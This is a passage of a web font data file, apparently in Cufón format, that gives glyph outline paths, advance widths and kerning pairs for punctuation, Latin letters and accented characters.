":24}},";":{"d":"73,-196r0,47r-39,0r0,-47r39,0xm74,-47r-32,74r-31,0r23,-74r40,0","w":106,"k":{" ":26}},"<":{"d":"17,-109r182,-80r0,40r-143,58r143,59r0,40r-182,-81r0,-36","w":216},"=":{"d":"18,-150r180,0r0,36r-180,0r0,-36xm18,-67r180,0r0,36r-180,0r0,-36","w":216},">":{"d":"17,-32r143,-59r-143,-58r0,-40r182,80r0,36r-182,81r0,-40","w":216},"?":{"d":"185,-195v0,47,-76,83,-69,122r-40,0v1,-24,9,-44,36,-70v18,-18,30,-30,30,-49v0,-23,-16,-40,-41,-40v-25,0,-44,18,-44,47r-41,0v-1,-57,43,-86,87,-86v49,0,82,36,82,76xm116,-47r0,47r-40,0r0,-47r40,0","w":204},"@":{"d":"237,-53r8,19v-30,31,-78,39,-100,39v-92,0,-139,-71,-139,-136v0,-74,57,-141,140,-141v68,0,125,47,125,116v0,60,-44,98,-76,98v-13,0,-30,-6,-33,-26v-23,41,-88,34,-92,-30v-4,-60,79,-126,110,-65r6,-20r25,0r-26,105v-1,12,8,14,14,14v19,0,49,-30,49,-76v0,-59,-48,-93,-101,-93v-66,0,-116,52,-116,118v0,50,35,114,114,114v31,0,68,-11,92,-36xm124,-81v37,0,49,-37,49,-70v0,-18,-12,-30,-27,-30v-25,0,-50,31,-50,66v0,26,16,34,28,34","w":277},"A":{"d":"73,-63r-24,63r-46,0r109,-266r39,0r107,266r-46,0r-25,-63r-114,0xm176,-97r-46,-120r-45,120r91,0","w":261,"k":{"v":19,"w":14,"y":17,"\u00fd":17,"\u00ff":17,"C":17,"\u00c7":17,"G":17,"O":17,"\u00d8":17,"\u0152":17,"\u00d3":17,"\u00d4":17,"\u00d6":17,"\u00d2":17,"\u00d5":17,"Q":17,"T":26,"u":13,"\u00fa":13,"\u00fb":13,"\u00fc":13,"\u00f9":13,"U":13,"\u00da":13,"\u00db":13,"\u00dc":13,"\u00d9":13,"V":37,"W":19,"Y":35,"\u00dd":35,"\u0178":35}},"B":{"d":"203,-76v-2,51,-39,76,-99,76r-78,0r0,-266r79,0v83,-12,111,94,50,124v46,15,48,54,48,66xm148,-193v-2,-40,-39,-36,-80,-36r0,73v41,3,82,0,80,-37xm163,-79v1,-44,-48,-43,-95,-41r0,83v46,1,94,4,95,-42","w":215,"k":{"U":5,"\u00da":5,"\u00db":5,"\u00dc":5,"\u00d9":5,",":6,".":6,"A":11,"\u00c6":11,"\u00c1":11,"\u00c2":11,"\u00c4":11,"\u00c0":11,"\u00c5":11,"\u00c3":11}},"C":{"d":"235,-81r45,0v-17,49,-67,86,-127,86v-80,0,-139,-63,-139,-139v0,-73,57,-137,139,-137v72,0,114,50,127,87r-45,0v-9,-17,-35,-50,-82,-50v-57,0,-96,46,-96,100v0,55,40,102,96,102v51,0,76,-39,82,-49","w":291,"k":{",":3,".":3,"A":18,"\u00c6":18,"\u00c1":18,"\u00c2":18,"\u00c4":18,"\u00c0":18,"\u00c5":18,"\u00c3":18}},"D":{"d":"26,0r0,-266v84,3,144,-17,191,43v65,82,27,232,-106,223r-85,0xm204,-133v0,-74,-51,-105,-136,-96r0,192v84,9,136,-23,136,-96","w":260,"k":{"V":13,"W":5,"Y":19,"\u00dd":19,"\u0178":19,",":22,".":20,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17}},"E":{"d":"26,0r0,-266r149,0r0,37r-107,0r0,76r105,0r0,37r-105,0r0,79r107,0r0,37r-149,0","w":193},"F":{"d":"26,0r0,-266r139,0r0,37r-97,0r0,78r95,0r0,37r-95,0r0,114r-42,0","w":177,"k":{"\u00eb":7,"\u00e3":7,"\u00e0":7,"\u00e4":7,",":64,".":58,"A":24,"\u00c6":24,"\u00c1":24,"\u00c2":24,"\u00c4":24,"\u00c0":24,"\u00c5":24,"\u00c3":24,"a":7,"\u00e6":7,"\u00e1":7,"\u00e2":7,"\u00e5":7,"e":7,"\u00e9":7,"\u00ea":7,"\u00e8":7,"o":7,"\u00f8":7,"\u0153":7,"\u00f3":7,"\u00f4":7,"\u00f6":7,"\u00f2":7,"\u00f5":7}},"G":{"d":"296,-134v3,83,-75,139,-142,139v-79,0,-140,-61,-140,-139v0,-80,63,-137,140,-137v57,0,109,34,128,80r-48,0v-42,-72,-178,-49,-178,57v0,120,167,134,190,34r-115,0r0,-34r165,0","w":307,"k":{",":10,".":9,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17}},"H":{"d":"68,0r-42,0r0,-266r42,0r0,112r115,0r0,-112r42,0r0,266r-42,0r0,-117r-115,0r0,117","w":251},"I":{"d":"26,0r0,-266r42,0r0,266r-42,0","w":93},"J":{"d":"84,-32v30,-1,36,-23,36,-51r0,-183r42,0r0,173v5,64,-30,93,-81,98v-17,2,-79,-18,-79,-75r46,0v1,27,23,38,36,38","w":187,"k":{"u":4,"\u00fa":4,"\u00fb":4,"\u00fc":4,"\u00f9":4,",":7,".":8,"A":14,"\u00c6":14,"\u00c1":14,"\u00c2":14,"\u00c4":14,"\u00c0":14,"\u00c5":14,"\u00c3":14,"a":4,"\u00e6":4,"\u00e1":4,"\u00e2":4,"\u00e4":4,"\u00e0":4,"\u00e5":4,"\u00e3":4,"e":4,"\u00e9":4,"\u00ea":4,"\u00eb":4,"\u00e8":4,"o":4,"\u00f8":4,"\u0153":4,"\u00f3":4,"\u00f4":4,"\u00f6":4,"\u00f2":4,"\u00f5":4}},"K":{"d":"32,0r0,-266r43,0r0,126r97,-126r45,0r-104,132r115,134r-53,0r-100,-123r0,123r-43,0","w":226,"k":{"y":15,"\u00fd":15,"\u00ff":15,"O":14,"\u00d8":14,"\u0152":14,"\u00d3":14,"\u00d4":14,"\u00d6":14,"\u00d2":14,"\u00d5":14,"u":16,"\u00fa":16,"\u00fb":16,"\u00fc":16,"\u00f9":16,"a":17,"\u00e6":17,"\u00e1":17,"\u00e2":17,"\u00e4":17,"\u00e0":17,"\u00e5":17,"\u00e3":17,"e":17,"\u00e9":17,"\u00ea":17,"\u00eb":17,"\u00e8":17,"o":17,"\u00f8":17,"\u0153":17,"\u00f3":17,"\u00f4":17,"\u00f6":17,"\u00f2":17,"\u00f5":17}},"L":{"d":"27,0r0,-266r42,0r0,229r94,0r0,37r-136,0","w":164,"k":{"y":13,"\u00fd":13,"\u00ff":13,"O":18,"\u00d8":18,"\u0152":18,"\u00d3":18,"\u00d4":18,"\u00d6":18,"\u00d2":18,"\u00d5":18,"T":22,"V":36,"W":19,"Y":33,"\u00dd":33,"\u0178":33,"o":10,"\u00f8":10,"\u0153":10,"\u00f3":10,"\u00f4":10,"\u00f6":10,"\u00f2":10,"\u00f5":10}},"M":{"d":"65,0r-39,0r0,-266r58,0r83,206r81,-206r58,0r0,266r-39,0r1,-225r-88,225r-28,0r-88,-225","w":332},"N":{"d":"66,-266r138,202r-1,-202r41,0r0,266r-39,0r-139,-203r1,203r-41,0r0,-266r40,0","w":270},"O":{"d":"153,5v-80,0,-139,-63,-139,-137v0,-84,64,-139,139,-139v80,0,140,61,140,138v0,77,-60,138,-140,138xm153,-234v-58,0,-97,46,-97,101v0,55,41,101,98,101v58,0,96,-49,96,-101v0,-52,-39,-101,-97,-101","w":306,"k":{"T":15,"V":17,"W":6,"Y":18,"\u00dd":18,"\u0178":18,",":14,".":14,"A":17,"\u00c6":17,"\u00c1":17,"\u00c2":17,"\u00c4":17,"\u00c0":17,"\u00c5":17,"\u00c3":17,"X":17}},"P":{"d":"204,-183v0,71,-54,92,-137,85r0,98r-43,0r0,-266r76,0v74,-3,104,26,104,83xm164,-182v-1,-48,-47,-49,-97,-47r0,94v49,1,97,2,97,-47","w":208,"k":{"\u00e4":6,",":76,".":72,"A":31,"\u00c6":31,"\u00c1":31,"\u00c2":31,"\u00c4":31,"\u00c0":31,"\u00c5":31,"\u00c3":31,"a":6,"\u00e6":6,"\u00e1":6,"\u00e2":6,"\u00e0":6,"\u00e5":6,"\u00e3":6,"e":6,"\u00e9":6,"\u00ea":6,"\u00eb":6,"\u00e8":6,"o":6,"\u00f8":6,"\u0153":6,"\u00f3":6,"\u00f4":6,"\u00f6":6,"\u00f2":6,"\u00f5":6}},"Q":{"d":"312,5v-32,-1,-67,-11,-78,-23v-23,15,-51,23,-78,23v-86,0,-140,-67,-140,-137v0,-74,57,-139,139,-139v82,0,141,64,141,137v0,50,-23,77,-33,89v14,9,26,13,49,15r0,35xm63,-122v68,-22,123,3,167,50v54,-58,5,-162,-75,-162v-56,0,-103,48,-92,112xm204,-46v-29,-34,-84,-64,-135,-41v33,62,89,65,135,41","w":314,"k":{",":-4}},"R":{"d":"171,-175v0,-49,-47,-59,-104,-54r0,229r-43,0r0,-266r75,0v83,-3,108,25,113,87v4,43,-30,77,-67,80r63,99r-45,0r-73,-120v45,5,81,-14,81,-55","w":219,"k":{"V":5,"Y":6,"\u00dd":6,"\u0178":6}},"S":{"d":"144,-73v0,-67,-127,-30,-127,-122v0,-95,156,-109,164,-3r-42,0v-3,-14,-9,-37,-40,-37v-22,0,-40,14,-40,37v0,26,20,31,63,48v33,13,64,31,64,74v0,43,-29,81,-86,81v-53,0,-87,-33,-88,-84r42,0v3,40,31,48,45,48v24,0,45,-18,45,-42","w":197,"k":{",":3,".":6}},"T":{"d":"64,0r0,-229r-61,0r0,-37r165,0r0,37r-61,0r0,229r-43,0","w":170,"k":{"\u00fc":27,"\u0161":18,"\u00f2":28,"\u00f6":28,"\u00e8":28,"\u00eb":28,"\u00ea":28,"\u00e3":28,"\u00e5":28,"\u00e0":28,"\u00e4":28,"\u00e2":28,"w":22,"y":11,"\u00fd":11,"\u00ff":11,"O":15,"\u00d8":15,"\u0152":15,"\u00d3":15,"\u00d4":15,"\u00d6":15,"\u00d2":15,"\u00d5":15,"u":27,"\u00fa":27,"\u00fb":27,"\u00f9":27,",":36,".":40,"A":26,"\u00c6":26,"\u00c1":26,"\u00c2":26,"\u00c4":26,"\u00c0":26,"\u00c5":26,"\u00c3":26,"a":28,"\u00e6":28,"\u00e1":28,"e":28,"\u00e9":28,"o":28,"\u00f8":28,"\u0153":28,"\u00f3":28,"\u00f4":28,"\u00f5":28,"c":28,"\u00e7":28,"-":28,"r":17,"s":18,":":18,";":22}},"U":{"d":"119,5v-51,3,-94,-49,-94,-105r0,-166r43,0r0,166v-4,35,15,68,50,68v36,0,51,-33,51,-68r0,-166r42,0r0,166v3,62,-33,102,-92,105","w":236,"k":{",":10,".":10,"A":13,"\u00c6":13,"\u00c1":13,"\u00c2":13,"\u00c4":13,"\u00c0":13,"\u00c5":13,"\u00c3":13}},"V":{"d":"104,0r-100,-266r44,0r77,214r78,-214r44,0r-101,266r-42,0","w":250,"k":{"\u00f6":38,"\u00f4":38,"\u00ee":9,"\u00e8":38,"\u00eb":38,"\u00ea":38,"\u00e3":38,"\u00e5":38,"\u00e0":38,"\u00e4":38,"\u00e2":38,"y":4,"\u00fd":4,"\u00ff":4,"G":17,"O":17,"\u00d8":17,"\u0152":17,"\u00d3":17,"\u00d4":17,"\u00d6":17,"\u00d2":17,"\u00d5":17,"u":21,"\u00fa":21,"\u00fb":21,"\u00fc":21,"\u00f9":21,",":55,".":55,"A":37,"\u00c6":37,"\u00c1":37,"\u00c2":37,"\u00c4":37,"\u00c0":37,"\u00c5":37,"\u00c3":37,"a":38,"\u00e6":38,"\u00e1":38,"e":38,"\u00e9":38,"i":9,"\u00ed":9,"\u00ef":9,"\u00ec":9,"o":38,"\u00f8":38,"\u0153":38,"\u00f3":38,"\u00f2":38,"\u00f5":38,"-":26,"r":18,":":17,";":22}},"W":{"d":"77,0r-72,-266r43,0r53,208r52,-208r32,0r53,208r52,-208r43,0r-73,266r-40,0r-51,-202r-52,202r-40,0","w":338,"k":{"\u00fc":15,"\u00f6":23,"\u00ea":23,"\u00e4":22,"y":9,"\u00fd":9,"\u00ff":9,"O":6,"\u00d8":6,"\u0152":6,"\u00d3":6,"\u00d4":6,"\u00d6":6,"\u00d2":6,"\u00d5":6,"u":15,"\u00fa":15,"\u00fb":15,"\u00f9":15,",":38,".":38,"A":19,"\u00c6":19,"\u00c1":19,"\u00c2":19,"\u00c4":19,"\u00c0":19,"\u00c5":19,"\u00c3":19,"h":3,"a":22,"\u00e6":22,"\u00e1":22,"\u00e2":22,"\u00e0":22,"\u00e5":22,"\u00e3":22,"e":23,"\u00e9":23,"\u00eb":23,"\u00e8":23,"i":5,"\u00ed":5,"\u00ee":5,"\u00ef":5,"\u00ec":5,"o":23,"\u00f8":23,"\u0153":23,"\u00f3":23,"\u00f4":23,"\u00f2":23,"\u00f5":23,"-":13,"r":10,":":9,";":13}},"X":{"d":"4,0r92,-139r-85,-127r48,0r61,96r61,-96r48,0r-84,128r92,138r-48,0r-70,-108r-68,108r-47,0","w":240,"k":{"C":17,"\u00c7":17,"O":17,"\u00d8":17,"\u0152":17,"\u00d3":17,"\u00d4":17,"\u00d6":17,"\u00d2":17,"\u00d5":17,"a":13,"\u00e6":13,"\u00e1":13,"\u00e2":13,"\u00e4":13,"\u00e0":13,"\u00e5":13,"\u00e3":13,"e":13,"\u00e9":13,"\u00ea":13,"\u00eb":13,"\u00e8":13,"o":13,"\u00f8":13,"\u0153":13,"\u00f3":13,"\u00f4":13,"\u00f6":13,"\u00f2":13,"\u00f5":13}},"Y":{"d":"88,0r0,-95r-84,-171r46,0r59,131r59,-131r46,0r-84,171r0,95r-42,0","w":217,"k":{"\u00fc":27,"\u00f6":37,"v":15,"O":18,"\u00d8":18,"\u0152":18,"\u00d3":18,"\u00d4":18,"\u00d6":18,"\u00d2":18,"\u00d5":18,"u":27,"\u00fa":27,"\u00fb":27,"\u00f9":27,",":49,".":49,"A":35,"\u00c6":35,"\u00c1":35,"\u00c2":35,"\u00c4":35,"\u00c0":35,"\u00c5":35,"\u00c3":35,"a":37,"\u00e6":37,"\u00e1":37,"\u00e2":37,"\u00e4":37,"\u00e0":37,"\u00e5":37,"\u00e3":37,"e":37,"\u00e9":37,"\u00ea":37,"\u00eb":37,"\u00e8":37,"i":8,"\u00ed":8,"\u00ee":8,"\u00ef":8,"\u00ec":8,"o":37,"\u00f8":37,"\u0153":37,"\u00f3":37,"\u00f4":37,"\u00f2":37,"\u00f5":37,"p":23,"q":37,"-":39,":":17,";":20,"S":12,"\u0160":12}},"Z":{"d":"172,-233r-114,196r117,0r0,37r-169,0r0,-27r118,-202r-120,0r0,-37r168,0r0,33","w":179},"[":{"d":"137,41r0,31r-96,0r0,-338r96,0r0,31r-59,0r0,276r59,0","w":162},"\\":{"d":"134,36r-109,-302r42,0r109,302r-42,0","w":201},"]":{"d":"26,72r0,-31r59,0r0,-276r-59,0r0,-31r95,0r0,338r-95,0","w":162},"^":{"d":"27,-135r62,-131r38,0r62,131r-41,0r-40,-98r-41,98r-40,0","w":216},"_":{"d":"180,45r-180,0r0,-18r180,0r0,18","w":180},"a":{"d":"224,-196r0,196r-38,0r0,-34v-14,26,-41,40,-72,40v-63,0,-101,-49,-101,-104v0,-60,44,-104,101,-104v39,0,63,22,72,41r0,-35r38,0xm187,-97v0,-41,-27,-70,-69,-70v-41,0,-67,32,-67,70v0,29,20,68,68,68v41,-1,68,-29,68,-68","w":248},"b":{"d":"24,0r0,-266r38,0r0,101v54,-72,171,-33,171,66v0,100,-129,141,-173,65r0,34r-36,0xm196,-98v0,-38,-29,-69,-68,-69v-40,0,-68,32,-68,69v0,37,27,69,67,69v45,0,69,-35,69,-69","w":246,"k":{"v":7,"y":7,"\u00fd":7,"\u00ff":7,",":10,".":10}},"c":{"d":"118,-167v-39,-1,-67,29,-67,69v0,40,30,69,67,69v33,0,53,-21,61,-40r38,0v-12,42,-50,75,-99,75v-64,0,-105,-50,-105,-104v0,-58,44,-104,103,-104v47,0,89,29,101,76r-38,0v-10,-26,-34,-41,-61,-41","w":229,"k":{"y":3,"\u00fd":3,"\u00ff":3,",":3,"h":3,"k":3,"l":3,"\u0142":3}},"d":{"d":"223,-266r0,266r-36,0r0,-34v-11,20,-33,40,-73,40v-62,0,-101,-47,-101,-104v0,-61,44,-104,100,-104v40,0,64,23,72,38r0,-102r38,0xm188,-99v-1,-38,-30,-67,-68,-68v-41,0,-69,32,-69,69v0,36,26,69,69,69v38,0,69,-33,68,-70","w":248},"e":{"d":"210,-59v-15,38,-50,65,-96,65v-64,0,-103,-52,-103,-104v0,-88,115,-138,175,-75v23,23,33,54,30,87r-167,0v3,69,97,79,122,27r39,0xm49,-115r130,0v-2,-26,-28,-55,-65,-55v-38,0,-63,28,-65,55","w":228,"k":{"v":9,"w":6,"y":8,"\u00fd":8,"\u00ff":8,",":3,".":4,"x":8}},"f":{"d":"28,0r0,-167r-26,0r0,-29r26,0v-7,-62,42,-79,74,-75r0,29v-16,-4,-41,11,-36,46r36,0r0,29r-36,0r0,167r-38,0","w":104,"k":{"\u0131":8,",":18,".":18,"l":8,"\u0142":8,"a":9,"\u00e6":9,"\u00e1":9,"\u00e2":9,"\u00e4":9,"\u00e0":9,"\u00e5":9,"\u00e3":9,"e":9,"\u00e9":9,"\u00ea":9,"\u00eb":9,"\u00e8":9,"f":8,"\u00df":8,"i":8,"\u00ed":8,"\u00ee":8,"\u00ef":8,"\u00ec":8,"o":9,"\u00f8":9,"\u0153":9,"\u00f3":9,"\u00f4":9,"\u00f6":9,"\u00f2":9,"\u00f5":9}},"g":{"d":"63,21v32,59,139,33,122,-56v-12,22,-36,41,-71,41v-59,0,-101,-45,-101,-103v0,-97,130,-141,172,-66r0,-33r37,0r0,173v0,72,-42,109,-105,109v-55,0,-88,-32,-97,-65r43,0xm186,-97v-1,-36,-26,-69,-68,-69v-37,0,-67,28,-67,68v0,37,26,69,67,69v39,0,68,-29,68,-68","w":246},"h":{"d":"115,-166v-75,0,-48,97,-53,166r-38,0r0,-266r38,0r0,98v12,-23,38,-34,64,-34v97,-2,77,110,79,202r-38,0v-5,-68,22,-166,-52,-166","w":228,"k":{"y":9,"\u00fd":9,"\u00ff":9,"u":5,"\u00fa":5,"\u00fb":5,"\u00fc":5,"\u00f9":5}},"i":{"d":"24,-227r0,-39r38,0r0,39r-38,0xm24,0r0,-196r38,0r0,196r-38,0","w":86},"j":{"d":"33,-226r0,-40r37,0r0,40r-37,0xm70,-196r0,193v2,42,-10,80,-71,78r0,-30v30,1,35,-21,34,-47r0,-194r37,0","w":99},"k":{"d":"26,0r0,-266r37,0r0,148r77,-78r45,0r-87,86r90,110r-44,0r-81,-101r0,101r-37,0","w":192,"k":{"y":7,"\u00fd":7,"\u00ff":7,"a":14,"\u00e6":14,"\u00e1":14,"\u00e2":14,"\u00e4":14,"\u00e0":14,"\u00e5":14,"\u00e3":14,"e":14,"\u00e9":14,"\u00ea":14,"\u00eb":14,"\u00e8":14,"o":14,"\u00f8":14,"\u0153":14,"\u00f3":14,"\u00f4":14,"\u00f6":14,"\u00f2":14,"\u00f5":14}},"l":{"d":"24,0r0,-266r38,0r0,266r-38,0","w":86},"m":{"d":"109,-166v-70,1,-41,101,-47,166r-38,0r0,-196r36,0r0,28v18,-45,108,-44,122,6v31,-67,140,-47,140,54r0,108r-37,0v-6,-65,24,-165,-46,-166v-70,-1,-41,100,-47,166r-38,0v-6,-65,24,-167,-45,-166","w":345,"k":{"y":9,"\u00fd":9,"\u00ff":9,"u":5,"\u00fa":5,"\u00fb":5,"\u00fc":5,"\u00f9":5}},"n":{"d":"24,0r0,-196r36,0r0,30v9,-20,31,-36,66,-36v108,0,73,108,79,202r-38,0v-6,-68,24,-166,-51,-166v-77,0,-49,97,-54,166r-38,0","w":228,"k":{"v":12,"y":12,"\u00fd":12,"\u00ff":12,"u":5,"\u00fa":5,"\u00fb":5,"\u00fc":5,"\u00f9":5}},"o":{"d":"13,-98v0,-52,39,-104,105,-104v66,0,104,51,104,104v0,53,-38,103,-104,103v-66,0,-105,-50,-105,-103xm51,-98v0,39,30,68,67,68v37,0,67,-29,67,-68v0,-39,-30,-68,-67,-68v-37,0,-67,29,-67,68","w":235,"k":{"v":10,"w":8,"y":9,"\u00fd":9,"\u00ff":9,",":8,".":9,"x":11}},"p":{"d":"24,71r0,-267r36,0r0,34v15,-23,40,-40,75,-40v135,2,126,210,0,208v-41,0,-64,-22,-73,-38r0,103r-38,0xm60,-98v0,38,30,69,68,69v40,0,68,-31,68,-69v0,-32,-22,-69,-68,-69v-39,-1,-68,30,-68,69","w":247,"k":{"y":8,"\u00fd":8,"\u00ff":8,",":8,".":9}},"q":{"d":"223,-196r0,267r-38,0r0,-104v-9,16,-31,39,-73,39v-59,0,-99,-47,-99,-102v0,-61,43,-106,101,-106v40,0,63,22,73,40r0,-34r36,0xm119,-29v60,0,90,-79,49,-118v-13,-13,-30,-20,-49,-20v-91,1,-88,138,0,138","w":247},"r":{"d":"24,0r0,-196r36,0r0,29v11,-23,31,-35,58,-35v-2,12,3,30,-2,38v-74,-5,-50,97,-54,164r-38,0","w":120,"k":{"v":-4,"y":-5,"\u00fd":-5,"\u00ff":-5,"u":-2,"\u00fa":-2,"\u00fb":-2,"\u00fc":-2,"\u00f9":-2,",":28,".":30,"h":-2,"k":-2,"l":-2,"\u0142":-2,"x":2,"a":12,"\u00e6":12,"\u00e1":12,"\u00e2":12,"\u00e4":12,"\u00e0":12,"\u00e5":12,"\u00e3":12,"e":11,"\u00e9":11,"\u00ea":11,"\u00eb":11,"\u00e8":11,"i":-2,"\u00ed":-2,"\u00ee":-2,"\u00ef":-2,"\u00ec":-2,"o":12,"\u00f8":12,"\u0153":12,"\u00f3":12,"\u00f4":12,"\u00f6":12,"\u00f2":12,"\u00f5":12,"c":12,"\u00e7":12,"d":9,"\u0131":9,"g":9,"m":-2,"n":-2,"\u00f1":-2,"p":-2,"q":8,"t":-9,"z":-2,"\u017e":-2,"-":17}},"s":{"d":"116,-54v2,-40,-99,-31,-99,-88v0,-73,124,-87,131,-3r-37,0v0,-15,-10,-26,-29,-26v-18,0,-28,12,-28,25v11,44,100,21,100,88v0,38,-31,64,-70,64v-31,0,-69,-18,-71,-63r37,0v2,45,64,40,66,3","w":167,"k":{"w":6,",":2,".":3}},"t":{"d":"39,0r0,-167r-36,0r0,-29r36,0r0,-70r37,0r0,70r38,0r0,29r-38,0r0,167r-37,0","w":117,"k":{"a":10,"\u00e6":10,"\u00e1":10,"\u00e2":10,"\u00e4":10,"\u00e0":10,"\u00e5":10,"\u00e3":10,"e":10,"\u00e9":10,"\u00ea":10,"\u00eb":10,"\u00e8":10,"o":10,"\u00f8":10,"\u0153":10,"\u00f3":10,"\u00f4":10,"\u00f6":10,"\u00f2":10,"\u00f5":10}},"u":{"d":"205,-196r0,196r-35,0r0,-30v-9,20,-32,36,-67,36v-108,0,-73,-108,-79,-202r38,0v6,69,-24,167,52,167v77,1,47,-98,53,-167r38,0","w":229},"v":{"d":"191,-196r-75,196r-37,0r-75,-196r39,0r55,149r54,-149r39,0","w":195,"k":{",":32,".":32,"a":10,"\u00e6":10,"\u00e1":10,"\u00e2":10,"\u00e4":10,"\u00e0":10,"\u00e5":10,"\u00e3":10,"e":10,"\u00e9":10,"\u00ea":10,"\u00eb":10,"\u00e8":10,"o":10,"\u00f8":10,"\u0153":10,"\u00f3":10,"\u00f4":10,"\u00f6":10,"\u00f2":10,"\u00f5":10}},"w":{"d":"68,0r-65,-196r39,0r46,148r42,-136r31,0r43,136r45,-148r39,0r-65,196r-36,0r-42,-137r-41,137r-36,0","w":291,"k":{",":30,".":30,"a":8,"\u00e6":8,"\u00e1":8,"\u00e2":8,"\u00e4":8,"\u00e0":8,"\u00e5":8,"\u00e3":8,"e":6,"\u00e9":6,"\u00ea":6,"\u00eb":6,"\u00e8":6,"o":8,"\u00f8":8,"\u0153":8,"\u00f3":8,"\u00f4":8,"\u00f6":8,"\u00f2":8,"\u00f5":8}},"x":{"d":"2,0r70,-102r-66,-94r46,0r43,67r44,-67r44,0r-65,94r71,102r-46,0r-48,-73r-47,73r-46,0","w":190,"k":{"a":11,"\u00e6":11,"\u00e1":11,"\u00e2":11,"\u00e4":11,"\u00e0":11,"\u00e5":11,"\u00e3":11,"e":11,"\u00e9":11,"\u00ea":11,"\u00eb":11,"\u00e8":11,"o":11,"\u00f8":11,"\u0153":11,"\u00f3":11,"\u00f4":11,"\u00f6":11,"\u00f2":11,"\u00f5":11}},"y":{"d":"44,71r33,-77r-75,-190r40,0r54,143r55,-143r40,0r-107,267r-40,0","w":191,"k":{",":33,".":34,"a":9,"\u00e6":9,"\u00e1":9,"\u00e2":9,"\u00e4":9,"\u00e0":9,"\u00e5":9,"\u00e3":9,"e":9,"\u00e9":9,"\u00ea":9,"\u00eb":9,"\u00e8":9,"o":9,"\u00f8":9,"\u0153":9,"\u00f3":9,"\u00f4":9,"\u00f6":9,"\u00f2":9,"\u00f5":9,"r":3}},"z":{"d":"5,0r0,-27r99,-140r-96,0r0,-29r138,0r0,30r-96,137r99,0r0,29r-144,0","w":153},"{":{"d":"152,-269r0,30v-28,-2,-42,0,-42,31r0,72v0,30,-25,47,-34,52v15,4,34,20,34,48v0,42,-24,117,42,103r0,29v-45,2,-81,2,-80,-47r0,-72v0,-26,-18,-37,-33,-42r0,-39v13,-2,33,-15,33,-44v0,-52,-10,-126,43,-121r37,0","w":178},"|":{"d":"80,-270r41,0r0,360r-41,0r0,-360","w":199},"}":{"d":"27,-239r0,-30v45,-2,80,-1,80,48r0,73v0,29,19,42,32,44r0,39v-15,5,-32,16,-32,42v0,52,10,125,-44,119r-36,0r0,-29v28,2,41,0,41,-32r0,-71v0,-28,27,-45,35,-49v-17,-6,-35,-21,-35,-51r0,-72v4,-31,-14,-33,-41,-31","w":178},"~":{"d":"71,-123v24,0,57,24,78,25v14,0,23,-12,31,-24r10,35v-10,15,-23,29,-41,29v-38,0,-89,-53,-113,-2r-10,-34v9,-17,24,-29,45,-29","w":216},"\u00a1":{"d":"35,-149r0,-47r38,0r0,47r-38,0xm35,71r0,-192r38,0r0,192r-38,0","w":108},"\u00a2":{"d":"125,-13r-32,0r0,-38v-52,-11,-70,-54,-70,-83v0,-32,20,-74,70,-84r0,-36r30,0r0,36v33,8,57,31,66,59r-40,0v-24,-43,-89,-21,-88,24v0,25,18,49,48,49v23,0,35,-13,40,-21r40,0v-12,31,-37,51,-64,56r0,38"},"\u00a3":{"d":"208,-90v10,52,-20,90,-79,90r-115,0r0,-34v34,1,60,3,60,-34v0,-20,-13,-35,-27,-48r-43,0r0,-30r23,0v-33,-53,8,-127,79,-125v45,0,84,28,90,78r-40,0v-5,-20,-20,-41,-49,-41v-47,0,-65,58,-35,88r75,0r0,30r-54,0v21,16,35,53,8,82v47,5,81,-13,70,-56r37,0"},"\u00a5":{"d":"201,-170r0,32r-67,0v-5,8,-8,18,-7,33r74,0r0,32r-74,0r0,73r-42,0r0,-73r-73,0r0,-32r73,0v1,-15,-2,-25,-8,-33r-65,0r0,-32r49,0r-56,-96r45,0r56,103r57,-103r44,0r-56,96r50,0"},"\u0192":{"d":"100,-186v5,-49,33,-92,92,-84r-6,30v-33,-2,-44,27,-47,54r37,0r0,29r-42,0v-16,68,-14,150,-47,203v-16,25,-48,35,-83,26r6,-34v37,10,54,-19,59,-46r26,-149r-37,0r0,-29r42,0"},"\u00a7":{"d":"193,-203r-37,0v-6,-49,-77,-44,-80,-1v22,68,132,28,132,117v0,26,-15,44,-32,57v45,43,15,122,-61,120v-37,0,-89,-19,-90,-83r37,0v-3,64,98,60,98,11v0,-39,-68,-48,-100,-66v-13,-7,-42,-20,-42,-61v0,-13,4,-37,35,-56v-7,-9,-14,-22,-14,-40v0,-45,38,-66,77,-66v48,0,76,30,77,68xm174,-81v-9,-43,-68,-44,-99,-66v-33,14,-27,53,0,65r77,35v10,-5,22,-18,22,-34","w":225},"\u00a4":{"d":"186,-24r-28,-29v-29,23,-74,22,-103,0r-29,28r-20,-19r30,-29v-23,-28,-22,-73,0,-101r-30,-29r20,-20r30,30v29,-23,71,-22,100,0r30,-29r19,19r-29,29v22,28,22,73,0,101r30,29xm55,-123v0,28,23,51,51,51v28,0,51,-23,51,-51v0,-28,-23,-52,-51,-52v-28,0,-51,24,-51,52"},"'":{"d":"57,-160r-30,0r0,-106r30,0r0,106","w":83},"\u00ab":{"d":"12,-101r38,-67r29,0r-38,67r38,67r-29,0xm66,-101r38,-67r29,0r-38,67r38,67r-29,0","w":140},"\u00b7":{"d":"73,-115r0,47r-39,0r0,-47r39,0","w":106},"\u00b6":{"d":"79,41r0,-167v-44,0,-78,-22,-78,-69v0,-101,110,-64,199,-71r0,28r-20,0r0,279r-30,0r0,-279r-41,0r0,279r-30,0","w":229},"\u00bb":{"d":"90,-168r38,67r-38,67r-28,0r38,-67r-38,-67r28,0xm36,-168r38,67r-38,67r-28,0r37,-67r-37,-67r28,0","w":140},"\u00bf":{"d":"89,-149r0,-47r39,0r0,47r-39,0xm19,0v0,-48,76,-83,69,-122r40,0v-1,24,-8,43,-35,69v-18,18,-31,31,-31,49v0,55,80,52,84,2v0,-3,1,-6,1,-9r41,0v1,57,-43,87,-87,87v-49,0,-82,-36,-82,-76","w":204},"`":{"d":"58,-288r86,48r-11,23r-88,-44","w":199},"\u00b4":{"d":"56,-242r86,-48r12,28r-87,43","w":199},"\u00af":{"d":"164,-265r0,30r-129,0r0,-30r129,0","w":199},"\u00a8":{"d":"81,-275r0,49r-36,0r0,-49r36,0xm154,-275r0,49r-36,0r0,-49r36,0","w":199},"\u00b8":{"d":"109,0r-10,20v18,-4,35,8,35,28v1,32,-54,55,-68,5r20,0v4,17,28,14,28,-5v0,-15,-20,-18,-26,-7r-16,-8r15,-33r22,0","w":199},"\u